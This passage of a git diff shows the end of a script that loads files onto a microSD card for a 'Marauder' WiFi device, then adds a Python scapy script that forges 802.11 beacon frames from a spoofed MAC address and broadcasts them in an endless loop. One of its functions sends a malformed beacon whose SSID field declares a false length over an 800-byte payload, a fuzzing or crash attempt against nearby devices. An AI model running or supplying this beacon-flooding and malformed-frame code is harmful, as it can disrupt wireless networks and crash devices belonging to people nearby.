"\nCopying Minimal Files" + sudo cp marauder_cyd_microsd/index.html $mountpoint + sudo cp marauder_cyd_microsd/ap.config.txt $mountpoint + echo -e "\nListing" + ls -lah $mountpoint + echo -e "\numounting $partition from $mountpoint" + sudo umount $mountpoint +fi +echo -e "\n\nYou May Now Use on Marauder" + diff --git a/wifi-beacon-scapy.py b/wifi-beacon-scapy.py new file mode 100755 index 0000000..29b5ae1 --- /dev/null +++ b/wifi-beacon-scapy.py @@ -0,0 +1,25 @@ +from scapy.all import * + +iface = 'wlan1' +sender = 'ac:cb:12:ad:58:27' + +def beacon_raw(SSID, length=255): + dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender) + beacon = Dot11Beacon() + essid = Dot11Elt(ID='SSID',info=RawVal(SSID), len=length) + frame = RadioTap()/dot11/beacon/essid + sendp(frame, iface=iface, inter=0.250, loop=1) +# sendp(frame, iface=iface, inter=0.100, count=256) + +def beacon_normie(SSID): + dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender) + beacon = Dot11Beacon() + essid = Dot11Elt(ID='SSID',info=SSID, len=len(SSID)) + frame = RadioTap()/dot11/beacon/essid + sendp(frame, iface=iface, inter=0.250, loop=1) +# sendp(frame, iface=iface, inter=0.100, count=256) + +longgg = "\xFF"*800 +longggg = f"\x00{longgg}\x00" +#beacon_raw(longggg) +beacon_normie(b"\xFF\x00\xFF\x00\xFF\x00\xFF\x00\xFF\x00") diff --git a/wifi-helpers/connect-wifi b/wifi-helpers/connect-wifi old mode 100644 new mode 100755 diff --git a/wifi-helpers/disconnect-wifi b/wifi-helpers/disconnect-wifi old mode 100644 new mode 100755 diff --git a/wifi-helpers/wifi-monitor b/wifi-helpers/wifi-monitor old mode 100644 new mode 100755